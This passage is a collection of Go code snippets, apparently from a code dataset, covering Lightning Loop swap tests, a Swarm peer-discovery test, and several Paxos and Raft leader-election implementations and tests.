[]*loopdb.LoopIn{\n\t\t\t\t{\n\t\t\t\t\tContract: &loopdb.LoopInContract{\n\t\t\t\t\t\tLastHop: &peer2,\n\t\t\t\t\t},\n\t\t\t\t},\n\t\t\t},\n\t\t\tchanRules: chanRules,\n\t\t\texpected: &Suggestions{\n\t\t\t\tOutSwaps: []loop.OutRequest{\n\t\t\t\t\tchan1Rec,\n\t\t\t\t},\n\t\t\t\tDisqualifiedChans: map[lnwire.ShortChannelID]Reason{\n\t\t\t\t\tchanID2: ReasonLoopIn,\n\t\t\t\t},\n\t\t\t\tDisqualifiedPeers: noPeersDisqualified,\n\t\t\t},\n\t\t},\n\t\t{\n\t\t\tname: \"swap failed recently\",\n\t\t\tchannels: []lndclient.ChannelInfo{\n\t\t\t\tchannel1,\n\t\t\t},\n\t\t\tloopOut: []*loopdb.LoopOut{\n\t\t\t\t{\n\t\t\t\t\tContract: chan1Out,\n\t\t\t\t\tLoop: loopdb.Loop{\n\t\t\t\t\t\tEvents: []*loopdb.LoopEvent{\n\t\t\t\t\t\t\tfailedWithinTimeout,\n\t\t\t\t\t\t},\n\t\t\t\t\t},\n\t\t\t\t},\n\t\t\t},\n\t\t\tchanRules: chanRules,\n\t\t\texpected: &Suggestions{\n\t\t\t\tDisqualifiedChans: map[lnwire.ShortChannelID]Reason{\n\t\t\t\t\tchanID1: ReasonFailureBackoff,\n\t\t\t\t},\n\t\t\t\tDisqualifiedPeers: noPeersDisqualified,\n\t\t\t},\n\t\t},\n\t\t{\n\t\t\tname: \"swap failed before cutoff\",\n\t\t\tchannels: []lndclient.ChannelInfo{\n\t\t\t\tchannel1,\n\t\t\t},\n\t\t\tloopOut: []*loopdb.LoopOut{\n\t\t\t\t{\n\t\t\t\t\tContract: chan1Out,\n\t\t\t\t\tLoop: loopdb.Loop{\n\t\t\t\t\t\tEvents: []*loopdb.LoopEvent{\n\t\t\t\t\t\t\tfailedBeforeBackoff,\n\t\t\t\t\t\t},\n\t\t\t\t\t},\n\t\t\t\t},\n\t\t\t},\n\t\t\tchanRules: chanRules,\n\t\t\texpected: &Suggestions{\n\t\t\t\tOutSwaps: []loop.OutRequest{\n\t\t\t\t\tchan1Rec,\n\t\t\t\t},\n\t\t\t\tDisqualifiedChans: noneDisqualified,\n\t\t\t\tDisqualifiedPeers: noPeersDisqualified,\n\t\t\t},\n\t\t},\n\t\t{\n\t\t\tname: \"temporary failure\",\n\t\t\tchannels: []lndclient.ChannelInfo{\n\t\t\t\tchannel1,\n\t\t\t},\n\t\t\tloopOut: []*loopdb.LoopOut{\n\t\t\t\t{\n\t\t\t\t\tContract: chan1Out,\n\t\t\t\t\tLoop: loopdb.Loop{\n\t\t\t\t\t\tEvents: []*loopdb.LoopEvent{\n\t\t\t\t\t\t\tfailedTemporary,\n\t\t\t\t\t\t},\n\t\t\t\t\t},\n\t\t\t\t},\n\t\t\t},\n\t\t\tchanRules: chanRules,\n\t\t\texpected: &Suggestions{\n\t\t\t\tDisqualifiedChans: map[lnwire.ShortChannelID]Reason{\n\t\t\t\t\tchanID1: ReasonLoopOut,\n\t\t\t\t},\n\t\t\t\tDisqualifiedPeers: noPeersDisqualified,\n\t\t\t},\n\t\t},\n\t\t{\n\t\t\tname: \"existing on peer's channel\",\n\t\t\tchannels: []lndclient.ChannelInfo{\n\t\t\t\tchannel1,\n\t\t\t\t{\n\t\t\t\t\tChannelID: chanID3.ToUint64(),\n\t\t\t\t\tPubKeyBytes: peer1,\n\t\t\t\t},\n\t\t\t},\n\t\t\tloopOut: []*loopdb.LoopOut{\n\t\t\t\t{\n\t\t\t\t\tContract: chan1Out,\n\t\t\t\t},\n\t\t\t},\n\t\t\tpeerRules: map[route.Vertex]*SwapRule{\n\t\t\t\tpeer1: {\n\t\t\t\t\tThresholdRule: NewThresholdRule(0, 50),\n\t\t\t\t\tType: swap.TypeOut,\n\t\t\t\t},\n\t\t\t},\n\t\t\texpected: &Suggestions{\n\t\t\t\tDisqualifiedChans: noneDisqualified,\n\t\t\t\tDisqualifiedPeers: map[route.Vertex]Reason{\n\t\t\t\t\tpeer1: ReasonLoopOut,\n\t\t\t\t},\n\t\t\t},\n\t\t},\n\t}\n\n\tfor _, testCase := range tests {\n\t\ttestCase := testCase\n\n\t\tt.Run(testCase.name, func(t *testing.T) {\n\t\t\t// Create a manager config which will return the test\n\t\t\t// case's set of existing swaps.\n\t\t\tcfg, lnd := newTestConfig()\n\t\t\tcfg.ListLoopOut = func(context.Context) ([]*loopdb.LoopOut, error) {\n\t\t\t\treturn testCase.loopOut, nil\n\t\t\t}\n\t\t\tcfg.ListLoopIn = func(context.Context) ([]*loopdb.LoopIn, error) {\n\t\t\t\treturn testCase.loopIn, nil\n\t\t\t}\n\n\t\t\tlnd.Channels = testCase.channels\n\n\t\t\tparams := defaultParameters\n\t\t\tparams.AutoloopBudgetLastRefresh = testBudgetStart\n\t\t\tif testCase.chanRules != nil {\n\t\t\t\tparams.ChannelRules = testCase.chanRules\n\t\t\t}\n\n\t\t\tif testCase.peerRules != nil {\n\t\t\t\tparams.PeerRules = testCase.peerRules\n\t\t\t}\n\n\t\t\ttestSuggestSwaps(\n\t\t\t\tt, newSuggestSwapsSetup(cfg, lnd, params),\n\t\t\t\ttestCase.expected, nil,\n\t\t\t)\n\t\t})\n\t}\n}", "func testInitialPeersMsg(t *testing.T, peerPO, peerDepth int) {\n\t// generate random pivot address\n\tprvkey, err := crypto.GenerateKey()\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\n\tdefer func(orig func([]*BzzAddr) []*BzzAddr) {\n\t\tsortPeers = orig\n\t}(sortPeers)\n\tsortPeers = testSortPeers\n\tpivotAddr := pot.NewAddressFromBytes(PrivateKeyToBzzKey(prvkey))\n\t// generate control peers address at peerPO wrt pivot\n\tpeerAddr := pot.RandomAddressAt(pivotAddr, peerPO)\n\t// construct kademlia and hive\n\tto := NewKademlia(pivotAddr[:], NewKadParams())\n\thive := NewHive(NewHiveParams(), to, nil)\n\n\t// expected addrs in peersMsg response\n\tvar expBzzAddrs []*BzzAddr\n\tconnect := func(a pot.Address, po int) (addrs []*BzzAddr) {\n\t\tn := rand.Intn(maxPeersPerPO)\n\t\tfor i := 0; i < n; i++ {\n\t\t\tpeer, err := newDiscPeer(pot.RandomAddressAt(a, po))\n\t\t\tif err != nil {\n\t\t\t\tt.Fatal(err)\n\t\t\t}\n\t\t\thive.On(peer)\n\t\t\taddrs = append(addrs, peer.BzzAddr)\n\t\t}\n\t\treturn addrs\n\t}\n\tregister := func(a pot.Address, po int) {\n\t\taddr := pot.RandomAddressAt(a, po)\n\t\thive.Register(&BzzAddr{OAddr: addr[:]})\n\t}\n\n\t// generate connected and just registered peers\n\tfor po := maxPeerPO; po >= 0; po-- {\n\t\t// create a fake connected peer at po from peerAddr\n\t\tons := connect(peerAddr, po)\n\t\t// create a fake registered address at po from peerAddr\n\t\tregister(peerAddr, po)\n\t\t// we collect expected peer addresses only up till peerPO\n\t\tif po < peerDepth {\n\t\t\tcontinue\n\t\t}\n\t\texpBzzAddrs = append(expBzzAddrs, ons...)\n\t}\n\n\t// add extra connections closer to pivot than control\n\tfor po := peerPO + 1; po < maxPO; po++ {\n\t\tons := connect(pivotAddr, po)\n\t\tif peerDepth <= peerPO {\n\t\t\texpBzzAddrs = append(expBzzAddrs, ons...)\n\t\t}\n\t}\n\n\t// create a special bzzBaseTester in which we can associate `enode.ID` to the `bzzAddr` we created above\n\ts, _, err := newBzzBaseTesterWithAddrs(prvkey, [][]byte{peerAddr[:]}, DiscoverySpec, hive.Run)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\tdefer s.Stop()\n\n\t// peerID to use in the protocol tester testExchange expect/trigger\n\tpeerID := s.Nodes[0].ID()\n\t// block until control peer is found among hive peers\n\tfound := false\n\tfor attempts := 0; attempts < 2000; attempts++ {\n\t\tfound = hive.Peer(peerID) != nil\n\t\tif found {\n\t\t\tbreak\n\t\t}\n\t\ttime.Sleep(1 * time.Millisecond)\n\t}\n\n\tif !found {\n\t\tt.Fatal(\"timeout waiting for peer connection to start\")\n\t}\n\n\t// pivotDepth is the advertised depth of the pivot node we expect in the outgoing subPeersMsg\n\tpivotDepth := hive.Saturation()\n\t// the test exchange is as follows:\n\t// 1. pivot sends to the control peer a `subPeersMsg` advertising its depth (ignored)\n\t// 2. peer sends to pivot a `subPeersMsg` advertising its own depth (arbitrarily chosen)\n\t// 3. pivot responds with `peersMsg` with the set of expected peers\n\terr = s.TestExchanges(\n\t\tp2ptest.Exchange{\n\t\t\tLabel: \"outgoing subPeersMsg\",\n\t\t\tExpects: []p2ptest.Expect{\n\t\t\t\t{\n\t\t\t\t\tCode: 1,\n\t\t\t\t\tMsg: &subPeersMsg{Depth: uint8(pivotDepth)},\n\t\t\t\t\tPeer: peerID,\n\t\t\t\t},\n\t\t\t},\n\t\t},\n\t\tp2ptest.Exchange{\n\t\t\tLabel: \"trigger subPeersMsg and expect peersMsg\",\n\t\t\tTriggers: []p2ptest.Trigger{\n\t\t\t\t{\n\t\t\t\t\tCode: 1,\n\t\t\t\t\tMsg: &subPeersMsg{Depth: uint8(peerDepth)},\n\t\t\t\t\tPeer: peerID,\n\t\t\t\t},\n\t\t\t},\n\t\t\tExpects: []p2ptest.Expect{\n\t\t\t\t{\n\t\t\t\t\tCode: 0,\n\t\t\t\t\tMsg: &peersMsg{Peers: testSortPeers(expBzzAddrs)},\n\t\t\t\t\tPeer: peerID,\n\t\t\t\t\tTimeout: 100 * time.Millisecond,\n\t\t\t\t},\n\t\t\t},\n\t\t})\n\n\t// for values MaxPeerPO < peerPO < MaxPO the pivot has no peers to offer to the control peer\n\t// in this case, no peersMsg will be sent out, and we would run into a time out\n\tif len(expBzzAddrs) == 0 {\n\t\tif err != nil {\n\t\t\tif err.Error() != \"exchange #1 \\\"trigger subPeersMsg and expect peersMsg\\\": timed out\" {\n\t\t\t\tt.Fatalf(\"expected timeout, got %v\", err)\n\t\t\t}\n\t\t\treturn\n\t\t}\n\t\tt.Fatalf(\"expected timeout, got no error\")\n\t}\n\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n}", "func TestLeaderElectionJumpToGreaterView(t *testing.T) {\n\tp := newPaxos(&Config{ID: 1, NodeCount: 5})\n\n\tif p.progressTimer.isSet() {\n\t\tt.Fatalf(\"expected unset progress timer\")\n\t}\n\tif p.prepare != nil {\n\t\tt.Fatalf(\"expected nil *pb.Prepare\")\n\t}\n\tif exp, a := uint64(0), p.lastInstalled; a != exp {\n\t\tt.Fatalf(\"expected last installed view %d; found %d\", exp, a)\n\t}\n\tassertLeaderElectionState := func(expLastAttempted, expViewChanges int) {\n\t\tassertState(t, p, StateLeaderElection)\n\t\tif exp, a := uint64(expLastAttempted), p.lastAttempted; a != exp {\n\t\t\tt.Fatalf(\"expected last attempted view %d; found %d\", exp, a)\n\t\t}\n\t\tif exp, a := expViewChanges, len(p.viewChanges); a != exp {\n\t\t\tt.Fatalf(\"expected %d ViewChange message, found %d\", exp, a)\n\t\t}\n\t}\n\tassertLeaderElectionState(1, 1)\n\n\t// ViewChange message from node 0 should be applied successfully.\n\tvc := &pb.ViewChange{NodeId: 0, AttemptedView: 1}\n\tp.onViewChange(vc)\n\tassertLeaderElectionState(1, 2)\n\n\t// ViewChange message for larger view should replace current attempt.\n\tvc = &pb.ViewChange{NodeId: 2, AttemptedView: 6}\n\tp.onViewChange(vc)\n\tassertLeaderElectionState(6, 2)\n\n\t// ViewChange message from node 1 should be applied successfully.\n\t// Leader election should complete, because quorum of 3 nodes achieved.\n\tvc = &pb.ViewChange{NodeId: 3, AttemptedView: 6}\n\tp.onViewChange(vc)\n\tassertLeaderElectionState(6, 3)\n\tif exp, a := uint64(6), p.lastInstalled; a != exp {\n\t\tt.Fatalf(\"expected last installed view %d after leader election; found %d\", exp, a)\n\t}\n\tif !p.progressTimer.isSet() {\n\t\tt.Fatalf(\"expected progress timer to be set after completed leader election\")\n\t}\n}", "func Make(peers []*labrpc.ClientEnd, me int,\n persister *Persister, applyCh chan ApplyMsg) *Raft {\n rf := &Raft{}\n rf.peers = peers\n rf.persister = persister\n rf.me = me\n rf.applyCh = applyCh\n\n // Your initialization code here (2A, 2B, 2C).\n rf.dead = 0\n\n rf.currentTerm = 0\n rf.votedFor = -1\n rf.commitIndex = -1\n rf.lastApplied = -1\n rf.state = Follower\n rf.gotHeartbeat = false\n\n // initialize from state persisted before a crash\n rf.readPersist(persister.ReadRaftState())\n\n // Start Peer State Machine\n go func() {\n // Run forver\n for {\n \n if rf.killed() {\n fmt.Printf(\"*** Peer %d term %d: I have been terminated. Bye.\",rf.me, rf.currentTerm)\n return \n }\n \n rf.mu.Lock()\n state := rf.state\n rf.mu.Unlock()\n \n switch state {\n case Follower:\n fmt.Printf(\"-- peer %d term %d, status update: I am follolwer.\\n\",rf.me, rf.currentTerm)\n snoozeTime := rand.Float64()*(RANDOM_TIMER_MAX-RANDOM_TIMER_MIN) + RANDOM_TIMER_MIN\n fmt.Printf(\" peer %d term %d -- follower -- : Set election timer to time %f\\n\", rf.me, rf.currentTerm, snoozeTime)\n time.Sleep(time.Duration(snoozeTime) * time.Millisecond) \n \n rf.mu.Lock() \n fmt.Printf(\" peer %d term %d -- follower -- : my election timer had elapsed.\\n\",rf.me, rf.currentTerm)\n if (!rf.gotHeartbeat) {\n fmt.Printf(\"-> Peer %d term %d -- follower --: did not get heartbeat during the election timer. Starting election!\\n\",rf.me, rf.currentTerm) \n rf.state = Candidate\n }\n rf.gotHeartbeat = false\n rf.mu.Unlock()\n \n\n case Candidate:\n rf.mu.Lock()\n rf.currentTerm++\n fmt.Printf(\"-- peer %d: I am candidate! Starting election term %d\\n\",rf.me, rf.currentTerm)\n numPeers := len(rf.peers) // TODO: figure out what to with mutex when reading. Atomic? Lock?\n rf.votedFor = rf.me\n rf.mu.Unlock()\n \n voteCount := 1\n var replies = make([]RequestVoteReply, numPeers)\n rf.sendVoteRequests(replies, numPeers)\n\n snoozeTime := rand.Float64()*(RANDOM_TIMER_MAX-RANDOM_TIMER_MIN) + RANDOM_TIMER_MIN\n fmt.Printf(\" peer %d term %d -- candidate -- :Set snooze timer to time %f\\n\", rf.me, rf.currentTerm, snoozeTime)\n time.Sleep(time.Duration(snoozeTime) * time.Millisecond) \n \n rf.mu.Lock()\n fmt.Printf(\" peer %d term %d -- candidate -- :Waking up from snooze to count votes. %f\\n\", rf.me, rf.currentTerm, snoozeTime)\n if (rf.state != Follower) {\n fmt.Printf(\"-> Peer %d term %d -- candidate --: Start Counting votes...\\n\\n\",rf.me, rf.currentTerm)\n \n for id:=0; id < numPeers; id++ {\n if id != rf.me && replies[id].VoteGranted {\n voteCount++\n } \n }\n\n if voteCount > numPeers/2 {\n // Initialize leader nextIndex and match index\n for id:=0; id< (len(rf.peers)-1); id++{\n rf.nextIndex[id] = len(rf.log)\n rf.matchIndex[id] = 0\n }\n\n fmt.Printf(\"-- peer %d candidate: I am elected leader for term %d. voteCount:%d majority_treshold %d\\n\\n\",rf.me,rf.currentTerm, voteCount, numPeers/2)\n rf.state = Leader\n fmt.Printf(\"-> Peer %d leader of term %d: I send first heartbeat round to assert my authority.\\n\\n\",rf.me, rf.currentTerm)\n go rf.sendHeartbeats()\n // sanity check: (if there is another leader in this term then it cannot be get the majority of votes)\n if rf.gotHeartbeat {\n log.Fatal(\"Two leaders won election in the same term!\")\n }\n } else if rf.gotHeartbeat {\n fmt.Printf(\"-- peer %d candidate of term %d: I got heartbeat from a leader. So I step down :) \\n\",rf.me, rf.currentTerm)\n rf.state = Follower\n } else {\n fmt.Printf(\"-- peer %d candidate term %d: Did not have enough votes. Moving to a new election term.\\n\\n\",rf.me,rf.currentTerm)\n } \n } \n rf.mu.Unlock()\n \n\n case Leader:\n fmt.Printf(\"-- Peer %d term %d: I am leader.\\n\\n\",rf.me, rf.currentTerm)\n snoozeTime := (1/HEARTBEAT_RATE)*1000 \n fmt.Printf(\" Leader %d term %d: snooze for %f\\n\", rf.me, rf.currentTerm, snoozeTime)\n \n time.Sleep(time.Duration(snoozeTime) * time.Millisecond)\n \n rf.mu.Lock()\n if rf.state != Follower {\n\n if rf.gotHeartbeat {\n log.Fatal(\"Fatal Error: Have two leaders in the same term!!!\")\n }\n fmt.Printf(\" peer %d term %d --leader-- : I send periodic heartbeat.\\n\",rf.me, rf.currentTerm)\n go rf.sendHeartbeats()\n } \n rf.mu.Unlock()\n\n }\n }\n } ()\n \n\n return rf\n}", "func TestLeaderTransferWithCheckQuorum(t *testing.T) {\n\tnt := newNetwork(nil, nil, nil)\n\tdefer nt.closeAll()\n\tfor i := 1; i < 4; i++ {\n\t\tr := nt.peers[uint64(i)].(*raft)\n\t\tr.checkQuorum = true\n\t\tsetRandomizedElectionTimeout(r, r.electionTimeout+i)\n\t}\n\n\t// Letting peer 2 electionElapsed reach to timeout so that it can vote for peer 1\n\tf := nt.peers[2].(*raft)\n\tfor i := 0; i < f.electionTimeout; i++ {\n\t\tf.tick()\n\t}\n\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\tlead := nt.peers[1].(*raft)\n\n\tif lead.lead != 1 {\n\t\tt.Fatalf(\"after election leader is %x, want 1\", lead.lead)\n\t}\n\n\t// Transfer leadership to 2.\n\tnt.send(pb.Message{From: 2, To: 1, Type: pb.MsgTransferLeader})\n\n\tcheckLeaderTransferState(t, lead, StateFollower, 2)\n\n\t// After some log replication, transfer leadership back to 1.\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{}}})\n\n\tnt.send(pb.Message{From: 1, To: 2, Type: pb.MsgTransferLeader})\n\n\tcheckLeaderTransferState(t, lead, StateLeader, 1)\n}", "func TestLeaderSyncFollowerLog(t *testing.T) {\n\tents := []pb.Entry{\n\t\t{},\n\t\t{Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3},\n\t\t{Term: 4, Index: 4}, {Term: 4, Index: 5},\n\t\t{Term: 5, Index: 6}, {Term: 5, Index: 7},\n\t\t{Term: 6, Index: 8}, {Term: 6, Index: 9}, {Term: 6, Index: 10},\n\t}\n\tterm := uint64(8)\n\ttests := [][]pb.Entry{\n\t\t{\n\t\t\t{},\n\t\t\t{Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3},\n\t\t\t{Term: 4, Index: 4}, {Term: 4, Index: 5},\n\t\t\t{Term: 5, Index: 6}, {Term: 5, Index: 7},\n\t\t\t{Term: 6, Index: 8}, {Term: 6, Index: 9},\n\t\t},\n\t\t{\n\t\t\t{},\n\t\t\t{Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3},\n\t\t\t{Term: 4, Index: 4},\n\t\t},\n\t\t{\n\t\t\t{},\n\t\t\t{Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3},\n\t\t\t{Term: 4, Index: 4}, {Term: 4, Index: 5},\n\t\t\t{Term: 5, Index: 6}, {Term: 5, Index: 7},\n\t\t\t{Term: 6, Index: 8}, {Term: 6, Index: 9}, {Term: 6, Index: 10}, {Term: 6, Index: 11},\n\t\t},\n\t\t{\n\t\t\t{},\n\t\t\t{Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3},\n\t\t\t{Term: 4, Index: 4}, {Term: 4, Index: 5},\n\t\t\t{Term: 5, Index: 6}, {Term: 5, Index: 7},\n\t\t\t{Term: 6, Index: 8}, {Term: 6, Index: 9}, {Term: 6, Index: 10},\n\t\t\t{Term: 7, Index: 11}, {Term: 7, Index: 12},\n\t\t},\n\t\t{\n\t\t\t{},\n\t\t\t{Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3},\n\t\t\t{Term: 4, Index: 4}, {Term: 4, Index: 5}, {Term: 4, Index: 6}, {Term: 4, Index: 7},\n\t\t},\n\t\t{\n\t\t\t{},\n\t\t\t{Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3},\n\t\t\t{Term: 2, Index: 4}, {Term: 2, Index: 5}, {Term: 2, Index: 6},\n\t\t\t{Term: 3, Index: 7}, {Term: 3, Index: 8}, {Term: 3, Index: 9}, {Term: 3, Index: 10}, {Term: 3, Index: 11},\n\t\t},\n\t}\n\tfor i, tt := range tests {\n\t\tleadStorage := NewMemoryStorage()\n\t\tdefer leadStorage.Close()\n\t\tleadStorage.Append(ents)\n\t\tlead := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, leadStorage)\n\t\tlead.loadState(pb.HardState{Commit: lead.raftLog.lastIndex(), Term: term})\n\t\tfollowerStorage := NewMemoryStorage()\n\t\tdefer followerStorage.Close()\n\t\tfollowerStorage.Append(tt)\n\t\tfollower := newTestRaft(2, []uint64{1, 2, 3}, 10, 1, followerStorage)\n\t\tfollower.loadState(pb.HardState{Term: term - 1})\n\t\t// It is necessary to have a three-node cluster.\n\t\t// The second may have more up-to-date log than the first one, so the\n\t\t// first node needs the vote from the third node to become the leader.\n\t\tn := newNetwork(lead, follower, nopStepper)\n\t\tn.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\t\t// The election occurs in the term after the one we loaded with\n\t\t// lead.loadState above.\n\t\tn.send(pb.Message{From: 3, To: 1, Type: pb.MsgVoteResp, Term: term + 1})\n\n\t\tn.send(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{}}})\n\n\t\tif g := diffu(ltoa(lead.raftLog), ltoa(follower.raftLog)); g != \"\" {\n\t\t\tt.Errorf(\"#%d: log diff:\\n%s\", i, g)\n\t\t}\n\t}\n}", "func TestLearnerLogReplication(t *testing.T) {\n\tn1 := newTestLearnerRaft(1, []uint64{1}, []uint64{2}, 10, 1, NewMemoryStorage())\n\tn2 := newTestLearnerRaft(2, []uint64{1}, []uint64{2}, 10, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(n1)\n\tdefer closeAndFreeRaft(n2)\n\n\tnt := newNetwork(n1, n2)\n\n\tn1.becomeFollower(1, None)\n\tn2.becomeFollower(1, None)\n\n\tsetRandomizedElectionTimeout(n1, n1.electionTimeout)\n\tfor i := 0; i < n1.electionTimeout; i++ {\n\t\tn1.tick()\n\t}\n\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgBeat})\n\n\t// n1 is leader and n2 is learner\n\tif n1.state != StateLeader {\n\t\tt.Errorf(\"peer 1 state: %s, want %s\", n1.state, StateLeader)\n\t}\n\tif !n2.isLearner {\n\t\tt.Error(\"peer 2 state: not learner, want yes\")\n\t}\n\n\tnextCommitted := n1.raftLog.committed + 1\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{Data: []byte(\"somedata\")}}})\n\tif n1.raftLog.committed != nextCommitted {\n\t\tt.Errorf(\"peer 1 wants committed to %d, but still %d\", nextCommitted, n1.raftLog.committed)\n\t}\n\n\tif n1.raftLog.committed != n2.raftLog.committed {\n\t\tt.Errorf(\"peer 2 wants committed to %d, but still %d\", n1.raftLog.committed, n2.raftLog.committed)\n\t}\n\n\tmatch := n1.getProgress(2).Match\n\tif match != n2.raftLog.committed {\n\t\tt.Errorf(\"progress 2 of leader 1 wants match %d, but got %d\", n2.raftLog.committed, match)\n\t}\n}", "func TestRaftLeaderLeaseLost(t *testing.T) {\n\tID1 := \"1\"\n\tID2 := \"2\"\n\tclusterPrefix := \"TestRaftLeaderLeaseLost\"\n\n\t// Create n1 node.\n\tfsm1 := newTestFSM(ID1)\n\tcfg := getTestConfig(ID1, clusterPrefix+ID1)\n\tcfg.LeaderStepdownTimeout = cfg.FollowerTimeout\n\tn1 := testCreateRaftNode(cfg, newStorage())\n\n\t// Create n2 node.\n\tfsm2 := newTestFSM(ID2)\n\tcfg = getTestConfig(ID2, clusterPrefix+ID2)\n\tcfg.LeaderStepdownTimeout = cfg.FollowerTimeout\n\tn2 := testCreateRaftNode(cfg, newStorage())\n\n\tconnectAllNodes(n1, n2)\n\tn1.transport = NewMsgDropper(n1.transport, 193, 0)\n\tn2.transport = NewMsgDropper(n2.transport, 42, 0)\n\tn1.Start(fsm1)\n\tn2.Start(fsm2)\n\tn2.ProposeInitialMembership([]string{ID1, ID2})\n\n\t// Find out who leader is.\n\tvar leader *Raft\n\tselect {\n\tcase <-fsm1.leaderCh:\n\t\tleader = n1\n\tcase <-fsm2.leaderCh:\n\t\tleader = n2\n\t}\n\n\t// Create a network partition between \"1\" and \"2\", so leader will lost its leader lease eventually.\n\tn1.transport.(*msgDropper).Set(ID2, 1)\n\tn2.transport.(*msgDropper).Set(ID1, 1)\n\n\t// The leader will lose its leadership eventually because it can't talk to\n\t// the other node.\n\t<-leader.fsm.(*testFSM).followerCh\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n fmt.Printf(\"\\n -> I the Peer %d in got Vote Request from cadidate %d!\\n\",rf.me, args.CandidateId)\n \n rf.mu.Lock()\n defer rf.mu.Unlock() // TODO: ask professor/TA about this atomisitc and if mutex is needed.\n \n reply.FollowerTerm = rf.currentTerm\n \n rf.CheckTerm(args.CandidateTerm) \n \n // 2B code - fix if needed\n logUpToDate := false\n if len(rf.log) == 0 {\n logUpToDate = true\n } else if rf.log[len(rf.log)-1].Term < args.LastLogTerm {\n logUpToDate = true\n } else if rf.log[len(rf.log)-1].Term == args.LastLogTerm && \n len(rf.log) <= (args.LastLogIndex+1) {\n logUpToDate = true\n }\n // 2B code end\n \n reply.VoteGranted = (rf.currentTerm <= args.CandidateTerm && \n (rf.votedFor == -1 || rf.votedFor == args.CandidateId) &&\n logUpToDate) \n\n if reply.VoteGranted {\n rf.votedFor = args.CandidateId\n fmt.Printf(\"-> I the Peer %d say: Vote for cadidate %d Granted!\\n\",rf.me, args.CandidateId)\n } else {\n fmt.Printf(\"-> I the Peer %d say: Vote for cadidate %d Denied :/\\n\",rf.me, args.CandidateId)\n }\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here (2A, 2B).\n\trf.mu.Lock()\n\tif args.Term < rf.currentTerm {\n\t\treply.Term = rf.currentTerm\n\t\treply.VoteGranted = false\n\t\trf.mu.Unlock()\n\t\treturn\n\t}\n\t// follow the second rule in \"Rules for Servers\" in figure 2 before handling an incoming RPC\n\tif args.Term > rf.currentTerm {\n\t\trf.currentTerm = args.Term\n\t\trf.state = FOLLOWER\n\t\trf.votedFor = -1\n\t\trf.persist()\n\t}\n\n\treply.Term = rf.currentTerm\n\treply.VoteGranted = true\n\t// deny vote if already voted\n\tif rf.votedFor != -1 {\n\t\treply.VoteGranted = false\n\t\trf.mu.Unlock()\n\t\treturn\n\t}\n\t// deny vote if consistency check fails (candidate is less up-to-date)\n\tlastLog := rf.log[len(rf.log)-1]\n\tif args.LastLogTerm < lastLog.Term || (args.LastLogTerm == lastLog.Term && args.LastLogIndex < len(rf.log)-1) {\n\t\treply.VoteGranted = false\n\t\trf.mu.Unlock()\n\t\treturn\n\t}\n\t// now this peer must vote for the candidate\n\trf.votedFor = args.CandidateID\n\trf.mu.Unlock()\n\n\trf.resetTimer()\n}", "func (n *Node) requestVotes(currTerm uint64) (fallback, electionResult bool) {\n\t// TODO: Students should implement this method\n\treturn\n}", "func (rf *Raft) processRequestVoteReply(peerNum int, args *RequestVoteArgs, reply *RequestVoteReply) {\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\n\t// Rule for all servers: If RPC request or response contains term T > currentTerm: set currentTerm = T, convert to follower (§5.1)\n\tif reply.Term > rf.currentTerm {\n\t\trf.convertToFollower(reply.Term)\n\t\treturn\n\t}\n\n\tif reply.VoteGranted {\n\t\trf.votesReceived++\n\t\tif rf.state == leader {\n\t\t\treturn\n\t\t}\n\t\t// it wins the election\n\t\tif rf.votesReceived > len(rf.peers)/2 {\n\t\t\t_, _ = DPrintf(newLeader(\"[T%v] %v: New Leader! (%v/%v votes) (%v -> %v)\"), rf.currentTerm, rf.me, rf.votesReceived, len(rf.peers), rf.state, leader)\n\t\t\trf.state = leader\n\n\t\t\t// Initialize all nextIndex values to the index just after the last one in its log\n\t\t\trf.nextIndex = make([]int, len(rf.peers))\n\t\t\trf.matchIndex = make([]int, len(rf.peers))\n\t\t\tfor i := range rf.nextIndex {\n\t\t\t\trf.nextIndex[i] = len(rf.log)\n\t\t\t}\n\n\t\t\t// send heartbeat messages to all of the other servers to establish its authority (§5.2)\n\t\t\tgo rf.sendPeriodicHeartBeats()\n\t\t}\n\t}\n}", "func (r *raft) leaderHandler(evt interface{}) {\n\tswitch e := evt.(type) {\n\tcase *RPCEvt:\n\t\tswitch o := e.o.(type) {\n\t\tcase *AppendEntriesResults:\n\t\t\tif o.Term > r.currentTerm {\n\t\t\t\tr.state = FollowerState\n\t\t\t\tr.votedFor = e.srcId\n\t\t\t\tr.currentTerm = o.Term\n\t\t\t\tr.cleanVoteGranteds()\n\t\t\t\tr.cleanIndexAryOnLeader()\n\t\t\t\tr.resetElectionTimeout()\n\t\t\t\tr.resetHeatbeatTimeout()\n\t\t\t\tr.saveStates()\n\t\t\t} else if !o.Success { //o.Term==r.currentTerm\n\t\t\t\tif e.srcId > -1 && e.srcId < r.nodes {\n\t\t\t\t\tif o.Term == r.currentTerm {\n\t\t\t\t\t\tr.nextIndex[e.srcId] -= 1\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\t// retry\n\t\t\t\tr.sndAppendEntries()\n\t\t\t} else {\n\t\t\t\tif e.srcId > -1 && e.srcId < r.nodes {\n\t\t\t\t\t// for we just append on entry per time\n\t\t\t\t\tlastIndex, _ := 